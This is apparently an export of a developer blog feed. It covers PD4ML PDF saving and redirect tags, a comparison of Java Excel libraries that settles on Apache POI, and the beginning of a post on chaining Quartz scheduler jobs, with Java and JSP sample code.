/></code></pre>
<p>This means that presentation frameworks such as Struts can generate the
entire form just as they would for a normal JSP. This
gives a clean separation, and seamless integration, between the presentation
(format/layout) of the PDF document and the business logic behind its
generation.</p>
<h4 id="temporary-saving-generated-pdf-to-hard-drive">Temporary saving generated PDF to hard drive</h4>
<p>With the <code><pd4ml:savefile></code> tag you can store the
just-generated PDF on the hard drive and either redirect the user’s browser to read the
PDF as a static resource or redirect the request to another URL for PDF
post-processing. The tag should be nested within
<code><pd4ml:transform></code> and should not have a body. There
are two ways of generating the PDF and redirecting the browser.</p>
<h4 id="routing-the-browser-to-the-pdf-generated">Routing the browser to the PDF generated</h4>
<p>Once the PDF is generated, the user can be directed to it using the
following piece of code.</p>
<div class="sourceCode" id="cb9"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:savefile</span></span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a><span class="ot"> uri</span><span class="op">=</span><span class="st">"/WEB/savefile/saved/"</span></span>
<span id="cb9-3"><a aria-hidden="true" href="#cb9-3" tabindex="-1"></a><span class="ot"> dir</span><span class="op">=</span><span class="st">"D:/spool/generated_pdfs"</span></span>
<span id="cb9-4"><a aria-hidden="true" href="#cb9-4" tabindex="-1"></a><span class="ot"> redirect</span><span class="op">=</span><span class="st">"pdf"</span></span>
<span id="cb9-5"><a aria-hidden="true" href="#cb9-5" tabindex="-1"></a><span class="ot"> debug</span><span class="op">=</span><span class="st">"false"</span><span class="dt">/></span></span></code></pre></div>
<p>The tag above forces PD4ML to save the generated PDF to
D:/spool/generated_pdfs with an autogenerated name. It is expected that the
local directory D:/spool/generated_pdfs corresponds to the URL
<code>http://yourserver.com/WEB/savefile/saved/</code> (as given in the
“uri” attribute).</p>
<p>After generation, PD4ML sends the client’s browser a redirect
command with a URL like this:
<code>http://yourserver.com/WEB/savefile/saved/generated_name.pdf</code>
where,</p>
<p><code>http://yourserver.com</code> - Context path</p>
<p><code>/WEB/savefile/saved</code> - URI given</p>
<p><code>generated_name.pdf</code> - Auto generated file Name</p>
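<p>The three parts above can be joined as in the following sketch. It only illustrates how the redirect URL is composed; PD4ML builds the real URL itself, and the class and method names here are assumptions made for the example.</p>

```java
// Illustration only: shows how the redirect URL is assembled from its parts.
// RedirectUrlSketch and build() are hypothetical names, not PD4ML API.
final class RedirectUrlSketch {

    // Join server base, "uri" attribute value and file name with exactly
    // one slash between each part.
    static String build(String serverBase, String uri, String fileName) {
        String base = serverBase.endsWith("/")
                ? serverBase.substring(0, serverBase.length() - 1)
                : serverBase;
        String path = uri.startsWith("/") ? uri : "/" + uri;
        if (!path.endsWith("/")) {
            path = path + "/";
        }
        return base + path + fileName;
    }

    public static void main(String[] args) {
        System.out.println(build("http://yourserver.com",
                "/WEB/savefile/saved/", "generated_name.pdf"));
    }
}
```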
<h4 id="routing-the-browser-to-the-next-page">Routing the browser to the
next page</h4>
<p>However if the browser needs to be redirected to the next page
instead of the PDF generated, it can be done in the following way.</p>
<div class="sourceCode" id="cb10"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a><span class="dt"><</span><span class="kw">pd4ml:savefile</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a><span class="ot"> dir</span><span class="op">=</span><span class="st">"D:/spool/generated_pdfs"</span></span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a><span class="ot"> redirect</span><span class="op">=</span><span class="st">"/mywebapp/send_pdf_by_email.jsp"</span></span>
<span id="cb10-4"><a aria-hidden="true" href="#cb10-4" tabindex="-1"></a><span class="ot"> debug</span><span class="op">=</span><span class="st">"false"</span><span class="dt">/></span></span></code></pre></div>
<p>The tag above forces PD4ML to save the generated PDF to
D:/spool/generated_pdfs with an auto generated name. After that it
forwards to /mywebapp/send_pdf_by_email.jsp with a REQUEST parameter
filename=<code><pdfname></code>. So send_pdf_by_email.jsp can read
file name using,</p>
<div class="sourceCode" id="cb11"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb11-1"><a aria-hidden="true" href="#cb11-1" tabindex="-1"></a><span class="bu">String</span> fileName <span class="op">=</span> request<span class="op">.</span><span class="fu">getParameter</span><span class="op">(</span><span class="st">"filename"</span><span class="op">);</span></span>
<span id="cb11-2"><a aria-hidden="true" href="#cb11-2" tabindex="-1"></a><span class="co">//Building the full path of the PDF generated</span></span>
<span id="cb11-3"><a aria-hidden="true" href="#cb11-3" tabindex="-1"></a><span class="bu">String</span> path <span class="op">=</span> <span class="st">"D:/spool/generated_pdfs"</span> <span class="op">+</span> <span class="st">"/"</span> <span class="op">+</span> fileName<span class="op">;</span></span></code></pre></div>
<p>Hence that JSP can read the just-generated PDF file and perform
post-processing or any other actions (like e-mail or file upload).</p>
<p>In both cases above you can predefine the PDF file name with the “name”
attribute. If a file with that name already exists in
D:/spool/generated_pdfs, then the new file name is appended with an
auto-incremented numeric value.</p>
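<p>The collision handling described above can be pictured with a short sketch. The exact naming scheme PD4ML uses is not stated here, so the <code>_1</code>, <code>_2</code> suffix format and all names below are assumptions for illustration only.</p>

```java
import java.nio.file.Files;
import java.nio.file.Path;

// Illustration only: the "_<n>" suffix format is an assumption, not the
// documented PD4ML behaviour. UniqueFileNameSketch is a hypothetical name.
final class UniqueFileNameSketch {

    // Return `name` if it is unused in `dir`; otherwise insert an
    // auto-incremented counter before the file extension.
    static String resolve(Path dir, String name) {
        if (!Files.exists(dir.resolve(name))) {
            return name;
        }
        int dot = name.lastIndexOf('.');
        String stem = dot < 0 ? name : name.substring(0, dot);
        String ext = dot < 0 ? "" : name.substring(dot);
        for (int i = 1; ; i++) {
            String candidate = stem + "_" + i + ext;
            if (!Files.exists(dir.resolve(candidate))) {
                return candidate;
            }
        }
    }
}
```

<p>Under these assumptions, if <code>report.pdf</code> already exists in the target directory, the sketch would pick <code>report_1.pdf</code>, then <code>report_2.pdf</code>, and so on.</p>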
<h3 id="instructions-for-installation">Instructions for
Installation</h3>
<p>PD4ML is intended to be used with JDK 1.3.1 and above. For deploying
PD4ML either as a console application or for online generation, use the
following jars available at the PD4ML site (given in the references):</p>
<ul>
<li>pd4ml.jar</li>
<li>pd4ml_tl.jar (for the tag library)</li>
</ul>
<h4 id="professional-version-features">Professional Version
Features</h4>
<p>Apart from the various features discussed above, the licensed
professional version includes lots of additional features such as:</p>
<ul>
<li>TTF embedding</li>
<li>Configuring Fonts directory</li>
<li>Embedding fonts to PDF from Java API</li>
<li>Embedding fonts to PDF from JSP</li>
<li>Watermark images</li>
<li>Table of contents</li>
<li>General notes</li>
</ul>
<h4 id="other-libraries">Other libraries</h4>
<p>A few other libraries available for PDF generation are <a href="http://xmlgraphics.apache.org/fop/">Apache FOP</a> and <a href="http://itextpdf.com/functionality">iText</a>.</p>
<p><strong>Apache FOP</strong></p>
<blockquote>
<p>Apache FOP (Formatting Objects Processor) is a print formatter driven
by XSL formatting objects (XSL-FO) and an output independent formatter.
It is a Java application that reads a formatting object (FO) tree and
renders the resulting pages to a specified output. Output formats
currently supported include PDF, PS, PCL, AFP, XML (area tree
representation), Print, AWT and PNG, and to a lesser extent, RTF and
TXT. The primary output target is PDF.</p>
</blockquote>
<p><strong>iText</strong></p>
<blockquote>
<p>iText is an open source library that
allows you to create and manipulate PDF documents. It enables developers
looking to enhance web and other applications with dynamic PDF document
generation and/or manipulation. - http://itextpdf.com/</p>
</blockquote>
<h4 id="references">References</h4>
<ul>
<li><a class="uri" href="http://pd4ml.com/api/index.html">http://pd4ml.com/api/index.html</a></li>
<li><a class="uri" href="http://pd4ml.com/index.htm">http://pd4ml.com/index.htm</a></li>
</ul>Spreadsheet generation using Java libraries2009-09-23T00:00:00-07:002009-09-23T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2009-09-23:/posts/spreadsheet-generation-using-java-libraries.htmlIn a recent working session, some of the best practices for a secure Android application development were discussed. Following were some of the important aspects of the discussion. Other the usual standards of securing the APK and securing the server-side components, some of the development and secure coding practices are listed in this post.<h3 id="introduction">Introduction</h3>
<p>Web Asset Tracker (WATr) is a web application mainly used
to maintain asset information in an RDBMS. A requirement arose
for the application to render its data as
a downloadable spreadsheet. This post documents a comparison
of leading frameworks for creating MS-Excel spreadsheets using
Java.</p>
<h3 id="purpose">Purpose</h3>
<p>The purpose of this document is to list the usage
and pros/cons of the following Excel Java APIs:</p>
<ol type="1">
<li>Apache POI</li>
<li>Java Excel API [JXL]</li>
<li>OpenXLS [Product of ExtenXLS]</li>
</ol>
<h3 id="scope">Scope</h3>
<p>For comparison of the Java frameworks, the following criteria
were used.</p>
<p>The API should have the ability:</p>
<ol type="1">
<li>to read existing Spreadsheets in MS-Excel 97, 2000, XP, 2003 and
2007 formats</li>
<li>to read existing Spreadsheets in ODS [OpenOffice.org Calc
Spreadsheet] formats</li>
<li>provide interoperability between various formats/versions</li>
<li>to edit existing Spreadsheets in the above mentioned formats</li>
<li>to create new spreadsheets in the above mentioned formats</li>
<li>to preserve and create formula and functions on various
worksheets</li>
<li>to manipulate multiple worksheets within a workbook</li>
<li>to manipulate, create and edit chart information</li>
<li>to freeze and split panes</li>
<li>to format cells, cell patterns, fonts and borders</li>
<li>for row and column sizing, formatting, auto-sizing, insertion and
deletion</li>
<li>for cell validations and named ranges</li>
<li>for row and column grouping and collapsing</li>
<li>to draw shapes using the Microsoft Office drawing tools</li>
<li>to add cell comments</li>
<li>to define printable formats and printing headers/footers</li>
<li>to add embeddable objects</li>
</ol>
<p>The API should also possess:</p>
<ol type="1">
<li>Mature documentation, tutorials and examples</li>
<li>Wide adoption</li>
<li>Active development and community support</li>
</ol>
<h4 id="apache-poi">Apache POI</h4>
<blockquote>
<p>Apache POI, a project run by the Apache Software Foundation, and
previously a sub-project of the Jakarta Project, provides pure Java
libraries for reading and writing files in Microsoft Office formats,
such as Word, PowerPoint and Excel. The name was originally an acronym
for “Poor Obfuscation Implementation”, referring humorously to the fact
that the file formats seemed to be deliberately obfuscated, but poorly,
since they were successfully reverse-engineered. This explanation - and
those of the similar names for the various sub-projects - were removed
from the official web-pages in order to better market the tools to
businesses who would not consider such humour appropriate. The POI
project is the master project for developing pure Java ports of file
formats based on Microsoft’s OLE 2 Compound Document Format. OLE 2
Compound Document Format is used by Microsoft Office Documents, as well
as by programs using MFC property sets to serialize their document
objects. - Wikipedia</p>
</blockquote>
<p>The various components of the Apache POI API are:</p>
<ol type="1">
<li>POIFS is the set of APIs for reading and writing OLE 2 Compound
Document Formats using (only) Java.</li>
<li>HSSF and XSSF are the set of APIs for reading and writing Microsoft
Excel 97-2007 and OOXML spreadsheets using (only) Java.</li>
<li>HWPF is the set of APIs for reading and writing Microsoft Word
97(-XP) documents using (only) Java.</li>
<li>HSLF is the set of APIs for reading and writing Microsoft PowerPoint
97(-XP) documents using (only) Java.</li>
<li>HPSF is the set of APIs for reading property sets using (only)
Java.</li>
</ol>
<h4 id="java-excel-api">Java Excel API</h4>
<blockquote>
<p>Java Excel API is a mature, open source java API enabling developers
to read, write, and modify Excel spreadsheets dynamically. Now Java
developers can read Excel spreadsheets, modify them with a convenient
and simple API, and write the changes to any output stream (e.g. disk,
HTTP, database, or any socket). - Wikipedia</p>
</blockquote>
<p>Some of the available features are:</p>
<ol type="1">
<li>Reads data from Excel 95, 97, 2000, XP, and 2003 workbooks</li>
<li>Reads and writes formulas (Excel 97 and later only)</li>
<li>Generates spreadsheets in Excel 2000 format</li>
<li>Supports font, number and date formatting</li>
<li>Supports shading, bordering, and coloring of cells</li>
<li>Modifies existing worksheets</li>
<li>Supports copying of charts</li>
<li>Supports insertion and copying of images into spreadsheets</li>
<li>Supports logging with Jakarta Commons Logging, log4j, JDK 1.4 Logger,
etc.</li>
</ol>
<h4 id="limitations">Limitations</h4>
<ol type="1">
<li>JExcelApi does not generate chart, graph or macro information.
This information is, however, preserved when spreadsheets are copied</li>
<li>When adding images to a sheet, only the PNG image format is
supported</li>
<li>JExcelApi fails fatally when encountering invalid formulas, so parsing
client-supplied spreadsheets might be a problem</li>
<li>Poor documentation for advanced features like validation
lists, column and cell formatting</li>
</ol>
<h4 id="openxls-api">OpenXLS API</h4>
<p>OpenXLS is the open-source version of ExtenXLS (commercial Java
SDK)</p>
<p>Some of the available features are:</p>
<ol type="1">
<li>Compatible with Excel ’97-2003 file formats</li>
<li>Control over charts, formulas, and formatting from Java</li>
<li>Based on robust ExtenXLS 6 Codebase</li>
<li>Drop-in upgradability to ExtenXLS supported versions</li>
<li>Good documentation, user guide, and sample code gets you up to speed
fast</li>
<li>Insert, size, and position JPG, GIF, and PNG images in your
Spreadsheet files</li>
<li>Control over spreadsheet formatting</li>
<li>Preserves Charts, PivotTables</li>
<li>Preservation of VB macros (NOTE: VB runtime execution not
supported)</li>
<li>200+ Formula Functions Supported</li>
<li>Create and work with Named Ranges</li>
<li>Supports Merged Cells</li>
<li>Convert Spreadsheets to XML and vice-versa</li>
</ol>
<h4 id="limitations-1">Limitations</h4>
<ol type="1">
<li>Far fewer features than its commercial
counterpart.</li>
<li>Support is not available either through an active community or the
organization</li>
<li>Functions mostly as a springboard to the commercial
version</li>
<li>Does not support Excel 2007</li>
<li>Does not support Open Office Spreadsheet format</li>
</ol>
<h4 id="application-integration">Application Integration</h4>
<p><strong>Where we are trying to fit in this framework</strong></p>
<p>A Java Excel API should:</p>
<ul>
<li>provide us with a well-documented and mature API</li>
<li>provide us with extension points for our own customizations</li>
</ul>
<p><strong>How it is aligned with our current requirements</strong></p>
<p>A Java Excel API should provide us with:</p>
<ul>
<li>the ability to format Excel sheets</li>
<li>validation rules for cells/columns</li>
<li>formula validation and insertion</li>
</ul>
<p><strong>Is it going to be one-off (or) continued usage?</strong></p>
<p>A Java Excel API should be such that:</p>
<ul>
<li>It can be added as a plugin to the framework</li>
<li>It makes the export/import functionality implementation seamless</li>
<li>It has the capability to render images, charts, etc.</li>
</ul>
<h4 id="inferences">Inferences</h4>
<p>The inferences gained from performing this comparison:</p>
<ol type="1">
<li>JXL can be used for faster rendering, but it will fail on
huge data sets or failed formulae</li>
<li>OpenXLS acts just as a springboard to its commercial counterpart and
has limited functionality</li>
<li>Apache POI has a mature and active community with rapid
releases, good documentation and lots of features</li>
<li>Apache POI also has functionalities for OpenOffice documents which
would help in transforming results in spreadsheet to other formats such
as PDF, Word or PPT</li>
</ol>
<p>With these criteria in mind and based on the scope provided,
<strong>Apache POI</strong> was chosen to be integrated within the
framework.</p>
<p><em>Note: This is based upon reading the available documentation,
limited user experience and discussion forums</em></p>
<h4 id="references">References</h4>
<ul>
<li>http://poi.apache.org/</li>
<li>http://poi.apache.org/spreadsheet/quick-guide.html</li>
<li>https://olex.openlogic.com/packages/poi</li>
<li>http://poi.apache.org/news.html</li>
<li>http://jexcelapi.sourceforge.net/</li>
<li>https://olex.openlogic.com/packages/jexcel-api</li>
<li>http://www.extentech.com/estore/product_features.jsp?product_group_id=228</li>
<li>http://sourceforge.net/projects/openxls/</li>
</ul>Job chaining using Quartz2009-03-31T00:00:00-07:002009-03-31T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2009-03-31:/posts/job-chaining-using-quartz.htmlThis post is about how we used Quartz library to chain jobs rather than scheduling for indeterminate running time. This post explains the development of the Job schedule and the code changes required.<h3 id="project-usage">Project Usage</h3>
<p>Our project had a requirement to read a set of records from a
table that acts as a queue and send the pending mails. This reading
and sending of mails has to happen every five minutes. However, since the
SMTP server also needs to handle online mailing at times, the job may run
longer than the given five minutes. Also, if the number of records in the
table is high, the job exceeds the expected completion time of five
minutes. Hence it was decided to “chain” the jobs with a five-minute
delay.</p>
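<p>The idea of chaining can be sketched without Quartz. The example below is a plain-JDK analogue using <code>ScheduledExecutorService</code>, not the Quartz mechanism this post goes on to describe: each run schedules the next one only after it has finished, so a slow run never overlaps with its successor. The class name, the run limit and the millisecond delay are assumptions made to keep the sketch small; in the project the delay would be five minutes.</p>

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;

// Plain-JDK analogue of job chaining (not Quartz). Hypothetical names.
final class ChainedJobSketch {

    // Runs `job` `runs` times. The next run is scheduled only when the
    // current one has finished, `delayMillis` after its completion.
    // Returns the number of completed runs.
    static int runChained(Runnable job, int runs, long delayMillis) {
        if (runs <= 0) {
            return 0;
        }
        ScheduledExecutorService scheduler =
                Executors.newSingleThreadScheduledExecutor();
        AtomicInteger completed = new AtomicInteger();
        CountDownLatch done = new CountDownLatch(1);

        Runnable link = new Runnable() {
            @Override
            public void run() {
                try {
                    job.run();
                } finally {
                    // Chain the next run only after this one has ended.
                    if (completed.incrementAndGet() < runs) {
                        scheduler.schedule(this, delayMillis, TimeUnit.MILLISECONDS);
                    } else {
                        done.countDown();
                    }
                }
            }
        };

        scheduler.schedule(link, 0, TimeUnit.MILLISECONDS);
        try {
            done.await();
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        } finally {
            scheduler.shutdown();
        }
        return completed.get();
    }
}
```

<p>A fixed-rate schedule would start a new run every five minutes regardless of whether the previous one had finished; measuring the delay from the end of each run is what avoids overlapping mail batches.</p>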
<h3 id="introduction-to-quartz">Introduction to Quartz</h3>
<p>Quartz is an open source job scheduling framework that provides
simple but powerful mechanisms for job scheduling in Java applications.
Quartz allows developers to schedule jobs by time interval or by time of
day. It implements many-to-many relationships for jobs and triggers and
can associate multiple jobs with different triggers. Applications that
incorporate Quartz can reuse jobs from different events and also group
multiple jobs for a single event. While you can configure Quartz through
a property file (in which you can specify a data source for JDBC
transactions, global job and/or trigger listeners, plug-ins, thread
pools, and more) it is not at all integrated with the application
server’s context or references.</p>
<h3 id="jobs-and-triggers">Jobs and triggers</h3>
<p>The two fundamental units of Quartz’s scheduling package are jobs and
triggers. A job is an executable task that can be scheduled, while a
trigger provides a schedule for a job. While these two entities could
easily have been combined, their separation in Quartz is both
intentional and beneficial. By keeping the work to be performed separate
from its scheduling, Quartz allows you to change the scheduled trigger
for a job without losing the job itself, or the context around it. Also,
any singular job can have many triggers associated with it.</p>
<h3 id="simple-job-example">Simple Job Example</h3>
<p>An example of a Quartz job is given below. This class implements the
<code>execute(JobExecutionContext context)</code> method of the <code>Job</code> interface with a very simple
output statement. This method can contain any code that constitutes the
job to be executed.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="co">// SimpleQuartzJob.java</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">java</span><span class="op">.</span><span class="im">util</span><span class="op">.</span><span class="im">Date</span><span class="op">;</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">Job</span><span class="op">;</span></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">JobExecutionContext</span><span class="op">;</span></span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">JobExecutionException</span><span class="op">;</span></span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> SimpleQuartzJob <span class="kw">implements</span> Job <span class="op">{</span></span>
<span id="cb1-9"><a aria-hidden="true" href="#cb1-9" tabindex="-1"></a></span>
<span id="cb1-10"><a aria-hidden="true" href="#cb1-10" tabindex="-1"></a> <span class="kw">public</span> <span class="fu">SimpleQuartzJob</span><span class="op">()</span> <span class="op">{</span></span>
<span id="cb1-11"><a aria-hidden="true" href="#cb1-11" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb1-12"><a aria-hidden="true" href="#cb1-12" tabindex="-1"></a></span>
<span id="cb1-13"><a aria-hidden="true" href="#cb1-13" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">void</span> <span class="fu">execute</span><span class="op">(</span>JobExecutionContext context<span class="op">)</span> <span class="kw">throws</span> JobExecutionException <span class="op">{</span></span>
<span id="cb1-14"><a aria-hidden="true" href="#cb1-14" tabindex="-1"></a> <span class="bu">System</span><span class="op">.</span><span class="fu">out</span><span class="op">.</span><span class="fu">println</span><span class="op">(</span><span class="st">"In SimpleQuartzJob - executing its JOB at "</span></span>
<span id="cb1-15"><a aria-hidden="true" href="#cb1-15" tabindex="-1"></a> <span class="op">+</span> <span class="kw">new</span> <span class="bu">Date</span><span class="op">()</span> <span class="op">+</span> <span class="st">" by "</span> <span class="op">+</span> context<span class="op">.</span><span class="fu">getTrigger</span><span class="op">().</span><span class="fu">getName</span><span class="op">());</span></span>
<span id="cb1-16"><a aria-hidden="true" href="#cb1-16" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb1-17"><a aria-hidden="true" href="#cb1-17" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p><em>Notice that the execute method takes a JobExecutionContext object
as an argument. This object provides the runtime context around the job
instance. Specifically, it gives access to the scheduler and trigger,
which collaborated to initiate execution of the job as well as the job’s
JobDetail object. Quartz separates the execution and the surrounding
state of a job by placing the state in a JobDetail object and having the
JobDetail constructor initiate an instance of a job. The JobDetail
object stores the job’s listeners, group, data map, description, and
other properties of the job.</em></p>
<h4 id="simple-trigger-example">Simple Trigger Example</h4>
<p>A trigger defines a schedule for job
execution. Quartz offers a few different trigger options of varying
complexity. The SimpleTrigger given below shows the fundamentals of
triggers.</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="co">// SimpleTriggerRunner.java</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">JobDetail</span><span class="op">;</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">Scheduler</span><span class="op">;</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">SchedulerException</span><span class="op">;</span></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">Trigger</span><span class="op">;</span></span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">TriggerUtils</span><span class="op">;</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a> <span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">quartz</span><span class="op">.</span><span class="im">impl</span><span class="op">.</span><span class="im">StdSchedulerFactory</span><span class="op">;</span></span>
<span id="cb2-9"><a aria-hidden="true" href="#cb2-9" tabindex="-1"></a></span>
<span id="cb2-10"><a aria-hidden="true" href="#cb2-10" tabindex="-1"></a> <span class="kw">public</span> <span class="kw">class</span> SimpleTriggerRunner <span class="op">{</span></span>
<span id="cb2-11"><a aria-hidden="true" href="#cb2-11" tabindex="-1"></a> <span class="kw">public</span> <span class="dt">void</span> <span class="fu">scheduleTask</span><span class="op">()</span> <span class="kw">throws</span> SchedulerException <span class="op">{</span></span>
<span id="cb2-12"><a aria-hidden="true" href="#cb2-12" tabindex="-1"></a> <span class="cf">try</span><span class="op">{</span></span>
<span id="cb2-13"><a aria-hidden="true" href="#cb2-13" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Starting the scheduler in Quartz"</span><span class="op">);</span></span>
<span id="cb2-14"><a aria-hidden="true" href="#cb2-14" tabindex="-1"></a> StdSchedulerFactory schedFact <span class="op">=</span> <span class="kw">new</span> <span class="fu">StdSchedulerFactory</span><span class="op">();</span></span>
<span id="cb2-15"><a aria-hidden="true" href="#cb2-15" tabindex="-1"></a> Scheduler sched <span class="op">=</span> schedFact<span class="op">.</span><span class="fu">getScheduler</span><span class="op">();</span></span>
<span id="cb2-16"><a aria-hidden="true" href="#cb2-16" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Scheduling a Tickler job in Quartz"</span><span class="op">);</span></span>
<span id="cb2-17"><a aria-hidden="true" href="#cb2-17" tabindex="-1"></a></span>
<span id="cb2-18"><a aria-hidden="true" href="#cb2-18" tabindex="-1"></a> <span class="co">//Making a daily Trigger for the Job</span></span>
<span id="cb2-19"><a aria-hidden="true" href="#cb2-19" tabindex="-1"></a> Trigger simpleTrigger <span class="op">=</span> TriggerUtils<span class="op">.</span><span class="fu">makeDailyTrigger</span><span class="op">(</span><span class="dv">2</span><span class="op">,</span> <span class="bn">00</span><span class="op">);</span></span>
<span id="cb2-20"><a aria-hidden="true" href="#cb2-20" tabindex="-1"></a> simpleTrigger<span class="op">.</span><span class="fu">setName</span><span class="op">(</span><span class="st">"SimpleQuartzTrigger"</span><span class="op">);</span></span>
<span id="cb2-21"><a aria-hidden="true" href="#cb2-21" tabindex="-1"></a> simpleTrigger<span class="op">.</span><span class="fu">setGroup</span><span class="op">(</span>Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">);</span></span>
<span id="cb2-22"><a aria-hidden="true" href="#cb2-22" tabindex="-1"></a> JobDetail simpleJob <span class="op">=</span> <span class="kw">new</span> <span class="fu">JobDetail</span><span class="op">(</span><span class="st">"SimpleQuartzJob"</span><span class="op">,</span> Scheduler<span class="op">.</span><span class="fu">DEFAULT_GROUP</span><span class="op">,</span> SimpleQuartzJob<span class="op">.</span><span class="fu">class</span><span class="op">);</span></span>
<span id="cb2-23"><a aria-hidden="true" href="#cb2-23" tabindex="-1"></a> sched<span class="op">.</span><span class="fu">scheduleJob</span><span class="op">(</span>simpleJob<span class="op">,</span>simpleTrigger<span class="op">);</span></span>
<span id="cb2-24"><a aria-hidden="true" href="#cb2-24" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Tickler Mail Job Scheduled"</span><span class="op">);</span></span>
<span id="cb2-25"><a aria-hidden="true" href="#cb2-25" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-26"><a aria-hidden="true" href="#cb2-26" tabindex="-1"></a> <span class="cf">catch</span><span class="op">(</span><span class="bu">Exception</span> e<span class="op">){</span></span>
<span id="cb2-27"><a aria-hidden="true" href="#cb2-27" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">info</span><span class="op">(</span><span class="st">"Error while scheduling the jobs."</span><span class="op">);</span></span>
<span id="cb2-28"><a aria-hidden="true" href="#cb2-28" tabindex="-1"></a> logger<span class="op">.</span><span class="fu">error</span><span class="op">(</span>e<span class="op">);</span></span>
<span id="cb2-29"><a aria-hidden="true" href="#cb2-29" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-30"><a aria-hidden="true" href="#cb2-30" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb2-31"><a aria-hidden="true" href="#cb2-31" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<p>The scheduling method starts by instantiating a SchedulerFactory and
getting the scheduler. As discussed earlier, the JobDetail object is
created by taking the Job (SimpleQuartzJob) as an argument to its
constructor. TriggerUtils.makeDailyTrigger creates a trigger
that fires the associated job(s) at 2:00 am every day. There are a
number of other ways to configure a trigger. In addition to a
specified number of repeats and a specified repeat interval, jobs may be
scheduled to execute at a specific calendar time, given a maximum time
of execution, or given a priority. Some of the more advanced concepts include
CronTriggers, Job Stores, and the JobDataMap.</p>
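<p>To make the 2:00 am schedule concrete, here is a minimal sketch of how
the next firing time of a daily trigger could be computed. It uses only
<code>java.time</code> and is not how Quartz itself is implemented; the
class and method names (<code>DailyFireTimeSketch</code>,
<code>nextDailyFire</code>) are hypothetical.</p>

```java
import java.time.LocalDateTime;
import java.time.LocalTime;

public final class DailyFireTimeSketch {

    /**
     * Returns the next occurrence of hour:minute strictly after "now".
     * Assumption: plain local time, no time zone or DST handling.
     */
    public static LocalDateTime nextDailyFire(LocalDateTime now, int hour, int minute) {
        LocalDateTime candidate = now.toLocalDate().atTime(LocalTime.of(hour, minute));
        // If today's slot is not strictly in the future, roll over to tomorrow.
        return candidate.isAfter(now) ? candidate : candidate.plusDays(1);
    }

    public static void main(String[] args) {
        // Next 2:00 am relative to the current clock.
        System.out.println(nextDailyFire(LocalDateTime.now(), 2, 0));
    }
}
```

<p>Passing the current time in as a parameter, rather than reading the
clock inside the method, keeps the calculation easy to test.</p>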
<h3 id="need-for-job-chaining">Need for Job Chaining</h3>
<p>The job known as “MailProcessor” has to execute every five
